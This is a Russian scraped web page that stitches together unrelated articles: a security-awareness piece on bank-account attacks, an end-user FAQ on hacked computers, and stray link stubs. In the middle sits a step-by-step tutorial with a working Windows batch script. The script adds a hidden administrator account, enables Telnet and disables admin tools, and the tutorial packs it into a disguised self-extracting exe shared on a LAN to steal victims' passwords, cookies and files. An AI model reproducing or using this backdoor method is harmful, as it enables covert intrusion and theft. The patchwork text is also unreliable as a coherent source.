Как хакеры получают доступ к компьютеру

Как хакеры получают доступ к компьютеру

В этой статье мы рассмотрим различные сценарии, используемые злоумышленниками для доступа к вашему банковскому счету, а также способы защиты от этих методов.

С ростом популярности интернет-банкинга немудрено, что и хакеры тоже не дремлют и постоянно ищут способы раздобыть учетные записи для доступа к банковским счетам.

В этой статье мы рассмотрим различные сценарии, используемые злоумышленниками для доступа к вашему банковскому счету, а также способы защиты от этих методов.

1. Трояны, заточенные под мобильный банкинг

Современные технологии дошли до такого уровня, когда мы можем управлять финансами исключительно со смартфона. Обычно у банка есть приложение, которое можно использовать для совершения операций с банковским счетом. С одной стороны, налицо явное удобство, с другой – у злоумышленников, занимающихся созданием и распространением вредоносов, появляется новый вектор для атаки. Здесь наиболее часто реализуются два сценария.

Поддельная копия официального приложения

Самый простой сценарий атаки – маскировка под официальное банковское приложение. Суть метода: создание точной копии приложения и загрузка на сторонний сайт. Как только вы скачали подделку и ввели логин и пароль, информация отправляется злоумышленнику.

Перехват работы приложения

Более изощренный сценарий – создание трояна, заточенного под мобильный банкинг. В этом случае вредонос не имеет никакого отношения к официальному приложению. Как только троян попадает на ваш телефон, то выполняет сканирование системы на предмет присутствия банковских программ.

Как только вы запустили официальное приложение вредонос подменяет окно с идентичным интерфейсом той программы, которую вы запустили. Если все прошло гладко, пользователь не заметит подмены и введет учетную запись на поддельной странице авторизации. Соответственно, введенные сведения отправятся автору трояна.

Обычно для взлома требуется код подтверждения, присылаемый по SMS, и во время установки трояна запрашиваются права на чтения SMS с целью кражи присылаемого кода.

Перед скачиванием приложений из магазина обращайте особое внимание на количество уже совершенных загрузок. Если загрузок мало и нет отзывов, пока сложно сказать, внедрен ли туда вредонос.

Следует проявлять еще большую бдительность, если у «официального приложения» популярного банка мало загрузок. Скорее всего, вы имеете дело с мошенничеством.

Также будьте осторожны при выдаче прав приложениям. Если мобильная игра требует прав на чтение SMS без объяснения причин, лучше отказаться от установки. Кроме того, никогда не устанавливайте программы со сторонних сайтов, поскольку в этом случае вероятность подцепить вредоноса значительно повышается.

Поскольку пользователи становятся все более осведомленными относительно фишинговых сценариев, хакеры все чаще переключаются на реализацию атак, связанные с подсовыванием вредоносных ссылок. Один из наиболее неприятных сценариев – взлом электронной почты юристов и отправка фишинговых писем с достоверного адреса.

В этом случае довольно сложно распознать мошенничество, поскольку электронный адрес легитимный, а в некоторых случаях злоумышленник даже может общаться от имени владельца почты. Именно при реализации подобного сценария покупатель дома потерял 67 тысяч фунтов, поддерживая контакт через электронную почту, которая считалась легитимной.

Если электронный адрес выглядит явно подозрительно, очевидно, что доверять полученным письма не стоит. Когда электронная почта выглядит легитимно, но внутреннее чутье говорит о подвохе, постарайтесь связаться с собеседником по альтернативным каналам, чтобы проверить, не является ли учетная запись в почтовой системе скомпрометированной.

Хакеры также могут использовать и другие методы фишинга, как, например, кражу личных данных через социальные сети.

3. Клавиатурные шпионы

Этот метод кражи учетной записи для интернет-банка считается одним из наиболее незаметных. Клавиатурные шпионы используются для сбора все вводимой информации и последующей отправки собранного злоумышленнику.

На первый взгляд, этот метод не заслуживает внимания, однако представьте себе, что произойдет, если в браузере вы сначала введете адрес банка, а затем имя пользователя и пароль. У хакера будет все необходимое для доступа к вашему банковскому счету.

Установите надежный антивирус и почаще проверяйте систему. Хороший антивирус вовремя заметит и удалит клавиатурного шпиона прежде, чем вы понесете финансовые убытки.

Если банковское приложение поддерживает двухфакторную аутентификацию, пользуйтесь этой возможностью. В этом случае эффективность клавиатурного шпиона сильно снижается, поскольку даже после кражи учетной записи злоумышленнику не будет доступен аутентификационный код.

4. Атака «человек посередине»

Иногда для кражи учетной записи злоумышленники используют канал между вами и банковским сайтом. Подобные атаки называются «человек посередине» (MITM). Собственно, имя говорит само за себя. Суть метода – перехват коммуникаций между вами и легитимным сервисом.

Обычно во время MITM-атак осуществляется мониторинг и анализ данных, проходящих через небезопасный сервер. Когда вы отсылаете информацию об учетный записи через эту сеть, злоумышленник перехватывает данные при помощи сниффинга.

В других случаях хакер может использовать отравление кэша DNS для подмены сайта при вводе URL. В этом случае при вводе адреса www.yourbankswebsite.ru вы попадете на сайт-клон, подконтрольный злоумышленнику, который будет выглядеть идентично легитимному. Если вы окажетесь недостаточно осторожными, то введете учетную запись на поддельном сайте.

Никогда не работайте с конфиденциальной информацией в публичной или незащищенной сети. Будьте предельно осторожны и используйте что-то более безопасное, как, например, домашний Wi-Fi. Кроме того, когда вы авторизируйтесь на каком-то важном сайте, всегда проверяйте наличие HTTPS в адресной строке браузера. В случае отсутствия HTTPS весьма высока вероятность, что вы находитесь на поддельном сайте!

Читайте также:  Как запустить игру с параметром консоль

Если вы хотите поработать с конфиденциальными данными в публичной Wi-Fi сети, старайтесь заботиться о своей собственной безопасности, например, при помощи VPN сервиса, который шифрует всю информацию перед отправкой по сети. Если даже кто-то мониторит ваше подключение, то увидит только зашифрованные пакеты. Пользуйтесь надежными VPN сервисами.

5. Подмена SIM карты

Аутентификация через SMS – одно из самых серьезных препятствий для злоумышленников. К сожалению, есть способы обхода этих проверок даже без необходимости в получении доступа к вашему телефону.

Для подмены SIM-карты хакер связывается с мобильным провайдером от вашего имени и утверждает, что потерял телефон, и нужно перенести старый (то есть ваш текущий) номер на другую SIM-карту.

В случае успеха мобильный оператор переносит ваш номер на SIM-карту злоумышленника.

После получения SIM-карты с вашим номером двухфакторная аутентификация при помощи SMS кодов легко обходится, поскольку после авторизации проверочные SMS коды будут присылаться на телефон злоумышленника. Как вы понимаете, теперь опустошить ваш банковский счет будет проще простого.

Конечно, мобильные операторы будут задавать вопросы, чтобы удостовериться, что за сменой номера обращается хозяин номера, и для обхода подобных проверок, злоумышленнику требуется собирать персональную информацию о жертве. Однако даже в этом случае некоторые провайдеры выполняют верификацию недостаточно тщательно, что позволяет хакерам легко реализовать задуманное.

Таким образом, всегда следует заботиться о конфиденциальности персональных данных. Кроме того, не лишним будет убедиться, что мобильный оператор тщательно проверяет того, кто обращается за заменой SIM-карты. Когда на вашей стороне и на стороне оператора выполняются все необходимые меры безопасности, можно быть уверенным, что злоумышленник потерпит неудачу при попытке поменять SIM-карту.

Интернет-банкинг – очень удобный инструмент и для пользователя, и для хакера. Вы можете предпринять все необходимы меры безопасности, чтобы не стать жертвой подобных атак. Сохраняя персональные данные в безопасности, вы значительно понизите шансы злоумышленников на получение доступа к вашему банковскому счету.

Подписывайтесь на каналы "SecurityLab" в Telegram и Яндекс.Дзен, чтобы первыми узнавать о новостях и эксклюзивных материалах по информационной безопасности.

Привет всем, это моя первая статья на хабре, так что не судите строго. В этом посте я опишу как можно получить удаленный доступ к компьютеру пользователя в вашей локальной сети через командную строку, обходя все антивирусы и немного зная синтаксис командной строки Windows. Статья предназначена для использования только на Windows XP, но при желании можно переписать код под любую другую ОС семейства Windows. Итак, приступим. В целом, статья написана для пользователей начального уровня. Самая главная цель — это заполучить нужные данные (пароли, явки, дачи, доступ к почтовым ящикам, файлы ключей webmoney, куки и прочая важная перхоть) и уйти незаметно, не оставив следов проникновения. Итак, начнем, я нахожусь в локальной сети имеющей порядка 5000 пользователей, сеть со статикой или dhcp не имеет значения, мне розан ip адрес и я счастлив. В сети имеется тьма подсетей, роуты которых прописаны на серваке. MAC адрес компа прописан у админа сети, так как в моем случае, это было условие подключения к сетке, таким образом мой мак засветится в случае чего. Во избежание быть найденным, первым делом устанавливаем виртуальную машину (использовал VmWare 5.1), устанавливаем на нее XP, сканер портов (использовал SuperScan 3.00 Скачать можно здесь) и запускаем службу Telnet. Подключаем виртуальную машину к сети с помощью NAT и получаем таким образом совершенно другой mac-адрес машины смотрящей в сеть. Все гуд виртуалку поставили, идем дальше. Открываем обычный блокнот и пишем батник следующего содержания:

@Echo off
Net user Admin_Support lop /add >nul
Net localgroup net localgroup Ђ¤¬Ё­Ёбва в®ал Admin_support /add >nul
Net accounts /maxpwage:unlimited >nul sc config TlntSvr start= auto >nul
Sc start TlntSvr >nul
Reg add «HKLMSOFTWAREMicrosoftWindowsNTCurrentVersionWinlogonSpecialAccountsUserList » /v Admin_support /t REG_DWORD /d 0 >null
Reg add »HKCUSOFTWAREMicrosoftWindowsCurrentVersionpoliciesSystem» /v DisableRegistryTools /t Reg_dword /d 1 /f >nul Reg add «HKCUSOFTWAREPOLICIESMicrosoftMMC» /v RestrictPemitSnapins /t Reg_dword /d 1 /f >nul del %SestemRoot%system32compmgmt.msc >nul
del Start_game.bat

1. Echo off (думаю всем понятно, объяснять не стоит).

2. Net user Admin_Support lop /add >nul Создаем в системе учетную запись с произвольным логином, в примере: Admin_Support и паролем lop. Учетка появится в списке учетных записей пользователей, можно придумать другое имя, к примеру что-то похожее на SUPPORT_388945a0 (учетная запись поставщика для службы справки и поддержки), на которую большинство пользователей не обращают внимания. Есть 1 нюанс мы создали учетку, но ведь она появится при входе в систему у пользователя, необходимо ее скрыть, об этом будет описано ниже.

3. Net localgroup net localgroup Ђ¤¬Ё­Ёбва в®ал Admin_support /add >nul Добавляем учетку Аdmin_support в группу Администраторы, кодировка слова «Администраторы», как у меня в данном случае «Ђ¤¬Ё­Ёбва в®ал» обязательно должна быть в кодировке DOS. Можно сделать в обычном Far’e. Т.е. то слово у меня уже в кодировке dos.

4. Net accounts /maxpwage:unlimited >nul Период времени в днях, в течение которого будет действовать пароль пользователя. Значение unlimited снимает ограничение по времени. Значение параметра /maxpwage должно быть больше, чем значение параметра /minpwage. Допустимы значения от 1 до 49 710 дней (т. е. значение unlimited равно 49 710 дней), по умолчанию используется значение 90 дней.

Читайте также:  Дешифратор файлов после вируса cbf

5. Sc config TlntSvr start= auto >nul Устанавливаем службу телнет в режим запуска «авто».

6. Sc start TlntSvr >nul Стартуем службу телнет.

7.Reg add “HKLMSOFTWAREMicrosoftWindowsNTCurrentVersionWinlogonSpecialAccountsUserList ” /v admin_support /t REG_DWORD /d 0 >null Добавляем ключ в реестр, который скроет нашу учетку в записях в панели управления и при входе в винду (Аутентификации).

8. Reg add “HKCUSOFTWAREMicrosoftWindowsCurrentVersionpoliciesSystem” /v DisableRegistryTools /t Reg_dword /d 1 /f >nul Запрещаем запуск редактирования реестра. (Можно обойтись и без этого параметра).

9. Reg add “HKCUSOFTWAREPOLICIESMicrosoftMMC” /v RestrictPemitSnapins /t REG_DWORD /d 1 /f >nul
del %SestemRoot%system32compmgmt.msc >nul
Удаляем mmc (Не обязательный параметр).

10. Reg add “HKCUSOFTWAREPOLICIESMicrosoftwindowsSystem” /v DisableCMD /t REG_DWORD /d 2 /f >nul Запрещаю запуск командной строки. (Не обязательный параметр.)

11. Del Start_game.bat Удаляем сам батник.

Батник готов. Сохраняем содержимое блокнота как .bat файл, под любым именем, в моем случае это Start_game.bat

Далее делаем из bat файла exe файл с помощью обычного winrar’a. В параметрах winrar’a устанавливаем параметр «создать архив sfx» и «выполнить после распаковки файл» батник «Start_game.bat». Также в настройках создания архива указываем: распаковывать в скрытом режиме. Помимо этого добавляем к батнику, с помощью того же winrar’a иконку к файлу. Жмем создать архив и получаем exe-шник с иконкой. Работа с Winrar также показана в видеоуроке ниже.

З.Ы. Конечно же можно использовать и другие программы для создания exe файла, которые имеют различный нужный функционал, такой как задание размера файла, типа, скрытия окна распаковки и прочих интересных вещей. В данном примере для большей наглядности я использовал WinRAR.

(Делать можно необязательно exe файл можно создать и другие типы файлов).

Итак мы получили файл с именем Start_game.exe, также можно создать более оригинальный файл с актуальным именем, чтобы пользователи увидев его в сети захотели его скачать, например название фильма, который недавно вышел или скоро должен выйти и его все ждут, (например Трансформеры-3HDTVRip.avi) ну и так далее.

Далее расшариваем папку в сети с нашим Start_game.exe. Как только наш юзверь скачает и запустит наш Start_game.exe, сработает наш батник, и удалится. Открываем нашу виртуальную машину и запускаем сканер портов, где указываем диапозон сканирования нашей сети (в моем случае это 10.16.93.1-10.16.93.255) и порт телнета (22 или 23). Сканер покажет у какого ip адреса открыт порт телнета. Если порт открыт, смело подключаемся, открываем командную строку и подключаемся командой: telnet ip_адрес, где вводим наш логин admin_support и пароль lop. тем самым получаем доступ к командной строке юзверя, и делаем СВОЁ ДЕЛО! ))) Умея пользоваться командной строкой, можно найти и скопировать любые файлы на компьютере пользователя, скрыто установить практически любое нужное программное обеспечение, и много еще чего интересного. Для более наглядного понимания статьи выкладываю реальный видеоурок со своей сети. Урок довольно старый, так как занимался я этим довольно давно.

При желании батник можно доработать для более интересных нужд, в данной статье показан лишь простой способ доступа к ПК пользователя без его ведома.

З.Ы. Единственный минус батника — cmd.exe висит в процессах у пользователя в диспетчере задач. Но я думаю это не так страшно, так как обычные пользователи не особо заморачиваются в знании имени процесса в диспетчере задач.

Данная статья не подлежит комментированию, поскольку её автор ещё не является полноправным участником сообщества. Вы сможете связаться с автором только после того, как он получит приглашение от кого-либо из участников сообщества. До этого момента его username будет скрыт псевдонимом.

Что случилось?

А могу я не обнаружить?

Есть вариант, что вы никогда об этом не узнаете, что, конечно, печальней всего.

Ну, и пусть. Что он там найдет? Рецепты блинов?

Если доступ был получен к домашнему компьютеру, то пригодится все:

  • Пароли к интернет-банкингу, социальным сетям и почте
  • Номера пластиковых карт
  • Ваш компьютер весь

Если доступ получен к рабочему компьютеру, то тут дело гораздо серьезнее. Даже компьютер офис-менеджера является очень ценным объектом. Там злоумышленник может найти:

  • Списки сотрудников с должностями и адресами электронной почты
  • Пароли к внутреннему порталу
  • Иногда доступы к внутренним дисковым ресурсам (очень часто они не защищены)

Кроме документов и паролей, ценность представляет сам компьютер. На него можно установить специальную программу (а может, и не одну), которая незаметно, совершенно никак себя не показывая (без специальных других программ ее не обнаружить), будет записывать все, что вы делаете на компьютере и отправлять злоумышленнику. Также он от вашего имени (с вашего же компьютера) может совершать атаки на другие компьютеры. Что может привести вас к встрече с правоохранительными органами.

Какие еще напасти бывают?

Однако цель программы, как это не смешно, не навредить вам и убежать. Нет. Вам предложат выход: отправить на номер мобильного телефона (самый частый вариант) определенную сумму денег. Как предложат? Сама программа и предложит, появившись на вашем мониторе с какой-нибудь лаконичной фразой, объясняющей, что произошло и за какую сумму от этого можно избавиться.

Читайте также:  Как открыть формат tsv

Денег не требуют, но войти в почту не могу. Мой компьютер взломан?

Все ясно. Что делать?

На компьютере с Microsoft Windows это делается через Пуск, Панель управления, Учетные записи пользователей и семейная безопасность, Учетные записи пользователей, Изменение своего пароля. На компьютере с Windows 10 шаги такие: Пуск, Параметры, Учетные записи, Параметры входа. Если вы работаете с Mac OSX, то вам нужны Системные настройки, Пользователи и группы, Сменить пароль.

Дата рождения подойдет?

Отлично. Но я это не запомню. Лучше запишу.

Пароль можно сделать мнемоническим, т.е. состоящим из букв и цифр, указывающих на определенное слово (но не являющийся им), которое знаете только вы. Это можно быть до неузнаваемости измененное слово: части переставлены местами, разделены числами и другими знаками. Однако хороший пароль (кстати, меняйте его периодически) — это только половина дела. Компьютер, на котором побывал злоумышленник, скорее всего содержит вредоносные программы, от которых надо избавиться.

И как это все лечить?

Если антивирус говорит вам, что все хорошо и никакой опасности нет, проверьте, давно ли актуальные ли у него вирусные базы. Обновитесь. Не забывайте также регулярно загружать и устанавливать обновления операционной системы. 70% всех обновлений посвящены безопасности.

Проверьте настройки вашей антивирусной программы. Нет ли в них изменений. Особенно разделы исключений.

Если же до сих пор на вашем компьютере не установлен антивирус, то самое время это сделать.

Снова в школу!

Какую программу выбрать — дело вкуса и кошелька. Есть бесплатные версии, как, например, Microsoft Security Essentials (начиная с Windows 8 встроен). Есть вариант с подпиской. Вы не покупаете саму программу в вечное пользование, а раз в год вносите некоторую сумму (заметно меньшую по стоимости нежели покупка навсегда) и полноценно пользуетесь программой.

В конце концов на работе на вашем компьютере должен обязательно быть установлен антивирус. Это обязанность технической службы.

Пара слов о Mac OSX

Для Mac OSX лучшей из этого класса программ, на мой взгляд, является Little Snitch. Программа платная (но с бесплатным демонстрационным периодом). Работает тихо, не влияя на работоспособностью компьютера. При неизвестных подключениях, предлагает вам принять решение о запрете или разрешении, указывая при этом, что за программа на вашем компьютере хочет выйти в сеть и куда конкретно. Есть молчаливый режим, когда вас вообще не будут беспокоить, а блокировке подвергнуться только подозрительные подключения.

Что еще можно сделать?

  1. Не открывать прикрепленных к электронным письмам файлов, если они напоминают программу. Современные программы по работе с почтой сами вас об этом предупредят
  2. Не заходить на подозрительные сайты. Простое расширение WOT для браузеров Chrome и Firefox вовремя вас предупредит о небезопасности сайта для вашего компьютера
  3. Если вы сами не запрашивали на сайте социальной сети, интернет магазина и т.п. восстановления пароля, не открывайте подобных писем и не переходите по указанным там ссылкам. Скорее всего они ведут на очень похожий сайт и цель его как раз украсть ваш пароль или даже установить вредоносную программу на ваш компьютер.
  4. Не используйте простых паролей даже на безобидных сайтах, где вроде нет ваших личных, тем более финансовых, данных. Известно много случаев, когда доступ к онлайн банкингу был получен через последовательные взломы учетных записей в социальных сетях и электронной почты.
  5. Где это возможно, используйте двухфакторную защиту. Восстановить пароль можно только с использованием вашего почтового ящика или группы контрольных вопросов и, это главное, отправки смс на ваш мобильный телефон с кодом для подтверждения операции.
  6. В офисе возьмите за правило всегда блокировать компьютер (вообще компьютер выключать не надо). Даже, если вы отошли за чаем. Еще не встали из-за стола, сперва заблокируйте компьютер. Делается это очень легко. Для компьютеров с Windows необходимо на клавиатуре зажать кнопку Windows (обычно слева рядом с Alt) и нажать латинскую L.

Какой должен быть технический минимум на компьютере?

  1. Операционная система с самыми последними обновлениями, которые устанавливаются регулярно и сами
  2. Антивирус или комплексный продукт обеспечения безопасности компьютера. Так же с последними обновлениями, которые регулярно устанавливаются. На доступ к самой программе-защитнику необходимо установить пароль. Отличный от пароля для входа на компьютер.
  3. Да бы защитить важную для себя информацию, сохраняйте копии файлов на внешние диски, флешки или даже внешний дисковый массив (NAS). Последний может это дело в автоматическом режиме.

Две истории напоследок

Один мой друг, работая в компании, которая занимается проверкой безопасности, реализовал проект. В один рабочий день, сотрудники начали находить в офисе флешки, будто кем-то оставленные. Некоторые из нашедших вставили эти флешки в свои рабочие компьютеры. Некоторые посмотрели, что там на флешке дома.

Суть была в том, что флешки те были не простые — при подключении к компьютеру они автоматически без ведома пользователя запускали программу, которая находилась на скрытом от него разделе на флешке. Так руководство компании проверило бдительность своих сотрудников.

Ссылка на основную публикацию
Как установить ножку на телевизор самсунг
1. Перед тем, чтобы начать сборку телевизора, обязательно, первым делом, нужно на ровную поверхность положить какой-нибудь мягкий материал под экран...
Как узнать песню если не знаешь названия
Знакомая ситуация: в голове крутится одна и та же композиция, но вспомнить название, хоть убей, не получается? Лайфхакер поможет определить...
Как узнать пишущий ли дисковод на компьютере
Использование дисководов в компьютерах – DVD и CD-ROM – все дальше отходят на второй план. Но работа с ними для...
Как установить образ диска на компьютер
Формат ISO представляет собой образ оптического диска и предназначен для хранения и передачи информации без физического накопителя. Файл ISO —...
Adblock detector